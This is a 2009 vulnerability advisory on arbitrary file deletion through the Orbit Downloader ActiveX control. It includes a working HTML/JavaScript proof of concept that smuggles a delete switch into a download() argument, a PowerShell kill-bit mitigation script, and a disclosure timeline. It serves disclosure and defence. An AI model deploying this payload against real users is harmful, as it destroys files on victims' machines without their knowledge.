Orbit Downloader 2.8.7 Arbitrary File Deletion Vulnerability

Author: waraxe
Risk: [ Security Risk Unsorted ]
0day-ID: 0day-ID-9404
Category: remote exploits
Date added: 23-03-2009
Platform: unsorted
[waraxe-2009-SA#073] - Arbitrary File Deletion in Orbit Downloader <= 2.8.7
===============================================================================

Author: Janek Vind "waraxe"
Date: 21. March 2009
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-73.html


Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Orbit Downloader, leader of download manager revolution, is devoted to new
generation web (web2.0) downloading, such as video/music/streaming media from
Myspace, YouTube, Imeem, Pandora, Rapidshare, support RTMP. And to make general
downloading easier and faster.

http://www.orbitdownloader.com/


List of found vulnerabilities
===============================================================================

1. Arbitrary File Deletion
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

CLSID: {3F1D494B-0CEF-4468-96C9-386E2E4DEC90}
ProgID: Orbitmxt.Orbit
Executable: orbitmxt.dll
File Version: 2.1.0.2

Tested on the following platforms:

1. Windows XP Pro SP3/IE 6 SP1
2. Windows Vista Ultimate 64-bit SP1/IE 7

In both cases IE security settings were default for Internet Zone.
Exploitation tests ended successfully without any warnings or other interaction
from Internet Explorer.

Proof Of Concept:

<html><head>
<title>Orbit Downloader <= 2.8.7 Arbitrary File Deletion PoC by waraxe</title>
<script>
function test()
{
	waraxe.download('','','" /Lc:\\test.txt "','',1);
}
</script>
</head><body>
<object
id="waraxe" name="waraxe"
classid="CLSID:3F1D494B-0CEF-4468-96C9-386E2E4DEC90"
width="50" height="50">
</object>
<br><center>
<button onclick="javascript:test();">  Test  </button>
</body></html>

To test, first create a "test.txt" file in the root directory of C:, then open
the page in IE and click the Test button. "test.txt" should now be deleted :)
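
Mitigation check (an added example, not part of the original advisory): the control can be blocked in Internet Explorer by setting the kill bit for the CLSID listed above. The script below reports whether the control is registered and whether the kill bit is set, and sets it when run with -Apply; the function names and the -Apply switch are this example's own.

```powershell
# Added example (not from the advisory): audit or set the IE kill bit for the
# Orbitmxt.Orbit control. Run from an elevated 64-bit PowerShell prompt.
param([switch]$Apply)   # without -Apply the script only reports

$Clsid   = '{3F1D494B-0CEF-4468-96C9-386E2E4DEC90}'   # CLSID from the advisory
$KillBit = 0x00000400   # "Compatibility Flags" bit that stops IE instantiating the control
$Name    = 'Compatibility Flags'

# 32-bit and 64-bit IE read separate registry views, so cover both.
$Roots = @(
    'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility',
    'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
)

function Get-KillBitState([string]$Root) {
    $key   = Join-Path $Root $Clsid
    $flags = (Get-ItemProperty -Path $key -Name $Name -ErrorAction SilentlyContinue).$Name
    [pscustomobject]@{
        Key     = $key
        Flags   = if ($null -ne $flags) { '0x{0:X8}' -f $flags } else { '(not set)' }
        Blocked = ($null -ne $flags) -and (($flags -band $KillBit) -eq $KillBit)
    }
}

function Set-KillBit([string]$Root) {
    if (-not (Test-Path $Root)) { return }   # no Wow6432Node on 32-bit Windows
    $key = Join-Path $Root $Clsid
    if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
    $current = (Get-ItemProperty -Path $key -Name $Name -ErrorAction SilentlyContinue).$Name
    $new = $current -bor $KillBit            # keep any flags already present
    Set-ItemProperty -Path $key -Name $Name -Value $new -Type DWord
}

# Is the control registered on this machine at all? (either registry view)
$registered = @('HKLM:\SOFTWARE\Classes\CLSID', 'HKLM:\SOFTWARE\Wow6432Node\Classes\CLSID') |
    Where-Object { Test-Path (Join-Path $_ $Clsid) }
"Control registered: $([bool]$registered)"

if ($Apply) { $Roots | ForEach-Object { Set-KillBit $_ } }
$Roots | ForEach-Object { Get-KillBitState $_ } | Format-Table -AutoSize
```

The kill bit only stops Internet Explorer and other hosts that honour it from instantiating the control; it does not change orbitmxt.dll itself.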


Disclosure Timeline:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

03/04/09 Developer contacted
03/04/09 Developer's initial response
03/04/09 Findings sent to developer
03/18/09 New version 2.8.7 released, no fix for specific issue!
03/21/09 Public disclosure


Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greets to ToXiC, y3dips, Sm0ke, Heintz, slimjim100, pexli, mge, str0ke,
to all active waraxe.us forum members and to anyone else who knows me!

---------------------------------- [ EOF ] ------------------------------------